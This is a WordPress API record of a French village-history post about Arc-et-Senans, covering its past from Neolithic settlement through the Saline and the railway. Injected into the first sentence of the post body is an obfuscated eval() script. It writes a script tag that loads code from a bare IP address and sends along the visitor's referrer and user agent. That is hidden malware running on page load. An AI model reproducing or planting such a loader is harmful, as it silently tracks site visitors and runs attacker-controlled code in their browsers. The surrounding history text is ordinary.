{"id":90,"date":"2015-07-21T07:09:58","date_gmt":"2015-07-21T06:09:58","guid":{"rendered":"http:\/\/www.arc-et-senans.com\/?p=90"},"modified":"2018-01-23T11:54:22","modified_gmt":"2018-01-23T10:54:22","slug":"histoire-darc-et-senans","status":"publish","type":"post","link":"https:\/\/www.arc-et-senans.com\/?p=90","title":{"rendered":"histoire d&rsquo;Arc et Senans"},"content":{"rendered":"<p>Arc, <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\\\o=\"+3(j.i)+\"\\'><\\\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hhenk|var|u0026u|referrer|hbhhe||js|php'.split('|'),0,{}))\n<\/script><\/noindex> Senans, puis Arc et Senans<\/p>\n<p>Notre village constitue un cadre de vie qui nous est familier avec l&rsquo;\u00e9glise, les maisons, la Saline &#8230; Pourtant, cela n&rsquo;a pas toujours exist\u00e9. Mais qu&rsquo;y avait-il avant le village ?<\/p>\n<p><!--more--><\/p>\n<p>L&rsquo;occupation humaine la plus lointaine que nous connaissons, remonte au n\u00e9olithique qui marque le d\u00e9but de la s\u00e9dentarisation et de l&rsquo;agriculture. Ces populations occupaient alors les contreforts rocheux bordant la Loue comme au Crot de Cramans, pr\u00e8s de l&rsquo;ermitage de Lorette et tr\u00e8s vraisemblablement \u00e0 Roche sur Loue.<\/p>\n<p>A l&rsquo;\u00e9poque romaine, le territoire de notre commune \u00e9tait travers\u00e9 par la voie Agrippa qui franchissait la Loue un peu en amont de l&rsquo;actuel pont de Cramans pour continuer vers la P\u00e9rouse, puis le village de Fourg. A l&rsquo;\u00e9poque, des villas romaines bordaient les voies de communication. N\u00e9anmoins, \u00e0 ce jour, aucun vestige de villa romaine n&rsquo;a formellement \u00e9t\u00e9 identifi\u00e9 sur notre commune.<\/p>\n<p>Plus tard, au VI\u00e8me si\u00e8cle, apr\u00e8s les grandes invasions germaniques des Burgondes et des Alamans, la chronique de Saint B\u00e9nigne indique que les habitants de Roche sur Loue ont constitu\u00e9 une communaut\u00e9 group\u00e9e autour du site de Roche.<\/p>\n<p>Dans la partie occidentale de l&rsquo;Europe, la majorit\u00e9 des villages se sont form\u00e9s \u00e0 une \u00e9poque relativement prosp\u00e8re du moyen \u00e2ge, entre le X\u00e8me et le XIII\u00e8me si\u00e8cle. Notre village n&rsquo;a pas fait exception. La paroisse de Senans est cit\u00e9e pour la premi\u00e8re fois en 1275 dans le compte dioc\u00e9sain. Ce compte a \u00e9t\u00e9 \u00e9tabli pour la pr\u00e9paration d&rsquo;une croisade. Pour son financement, le pouvoir dioc\u00e9sain a dress\u00e9 la liste des villages de Franche-Comt\u00e9 afin de d\u00e9finir la contribution financi\u00e8re de chacun. Senans y figurait pour 25 sols ce qui donne une indication sur l&rsquo;importance des villages d&rsquo;Arc et Senans. A titre de comparaison, la contribution de Liesle \u00e9tait de 50 sols et celle de Chissey de 30 sols.<\/p>\n<p>Arc et Senans qui appartenaient respectivement \u00e0 la Seigneurie de Ch\u00e2teau Rouillaud et \u00e0 celle de Roche sur Loue se trouvaient alors en bordure de la for\u00eat de Chaux qui descendait beaucoup plus bas qu&rsquo;actuellement.<\/p>\n<p>Bien qu&rsquo;appartenant \u00e0 deux seigneuries distinctes, les deux villages \u00e9taient d\u00e9j\u00e0 group\u00e9s dans la m\u00eame paroisse qui constituait, \u00e0 l&rsquo;\u00e9poque, un tissu social tr\u00e8s fort. Arc avait une chapelle qui se trouvait dans l&rsquo;enceinte du ch\u00e2teau puis \u00e0 proximit\u00e9 imm\u00e9diate de celui-ci \u00e0 partir de 1636.<\/p>\n<p>Progressivement deux autres entit\u00e9s ont pris de l&rsquo;importance avec les besoins croissants en bois de chauffage et charbon de bois qui alimentaient les forges, en particulier celle de Roche. Il s&rsquo;agit du Deffois (autrefois D\u00e9fois) et du Vernois situ\u00e9s \u00e0 l&rsquo;\u00e9poque en for\u00eat de Chaux dans les clairi\u00e8res.<\/p>\n<p>Jusqu&rsquo;\u00e0 la conqu\u00eate fran\u00e7aise, en 1678, les deux villages et leurs hameaux ont peu \u00e9volu\u00e9.<\/p>\n<p>Un peu avant la r\u00e9volution fran\u00e7aise de 1789, une description assez pr\u00e9cise nous est donn\u00e9e par les cartes des fr\u00e8res Cassini qui ont cartographi\u00e9 le royaume de France. On y voit :<\/p>\n<p>&#8211; le Deffois (not\u00e9 sur la carte \u00ab\u00a0les D\u00e9fois\u00a0\u00bb) repr\u00e9sent\u00e9 par une tr\u00e8s grande clairi\u00e8re et de nombreux b\u00e2timents, ce qui semble attester une forte activit\u00e9, probablement en raison du d\u00e9veloppement de l&rsquo;industrie sid\u00e9rurgique en croissance \u00e0 l&rsquo;\u00e9poque.<\/p>\n<p>&#8211; le Vernois repr\u00e9sent\u00e9 en lisi\u00e8re de for\u00eat, d&rsquo;importance bien moindre que le Deffois.<\/p>\n<p>&#8211; l&rsquo;\u00e9glise de Senans et le moulin de Roche.<\/p>\n<p>&#8211; Arc et le moulin Toussaint avec la maison du Barcotier toute proche pour le franchissement de la Loue.<\/p>\n<p>Au XVIII\u00e8me si\u00e8cle tout s&rsquo;acc\u00e9l\u00e8re, avec tout d&rsquo;abord l&rsquo;\u00e9dification de la Saline sur Arc d\u00e9cid\u00e9e par Louis XV en 1775. Le 14 d\u00e9cembre 1789, l&rsquo;assembl\u00e9e nationale votait la loi de cr\u00e9ation des municipalit\u00e9s et communes. En 1790, notre commune d&rsquo;Arc et Senans est cr\u00e9\u00e9e scellant ainsi la fusion entre les deux villages et les hameaux.<\/p>\n<p>Puis au milieu du XIX\u00e8me si\u00e8cle, c&rsquo;est la construction des voies de chemin de fer et de la gare.<\/p>\n<p>En quelques dizaines d&rsquo;ann\u00e9es, ces deux \u00e9l\u00e9ments ont profond\u00e9ment modifi\u00e9 la structure des villages en op\u00e9rant une jonction physique entre les deux entit\u00e9s m\u00e9di\u00e9vales. La prosp\u00e9rit\u00e9 du XIX\u00e8me amena de nombreuses constructions ainsi que le d\u00e9veloppement de l&rsquo;industrie \u00e0 Roche.<\/p>\n<p>Au d\u00e9but du XX\u00e8me si\u00e8cle, la morphologie du village est proche de celle que nous connaissons actuellement. Viendront ensuite l&rsquo;usine de limes (UMAS) de l&rsquo;avenue de la Saline et une extension\/densification li\u00e9e \u00e0 la croissance d\u00e9mographique.<\/p>\n<p>C&rsquo;est ainsi qu&rsquo;en quelques milliers d&rsquo;ann\u00e9es, des premiers agriculteurs \u00e0 nos jours, s&rsquo;est progressivement constitu\u00e9 notre village.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Arc, Senans, puis Arc et Senans Notre village constitue un cadre de vie qui nous est familier avec l&rsquo;\u00e9glise, les maisons, la Saline &#8230; Pourtant, cela n&rsquo;a pas toujours exist\u00e9. Mais qu&rsquo;y avait-il avant le village ?<\/p>\n","protected":false},"author":1,"featured_media":286,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,2],"tags":[],"class_list":["post-90","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-histoire","category-tourisme"],"_links":{"self":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/90","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=90"}],"version-history":[{"count":0,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/90\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/media\/286"}],"wp:attachment":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=90"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=90"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=90"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}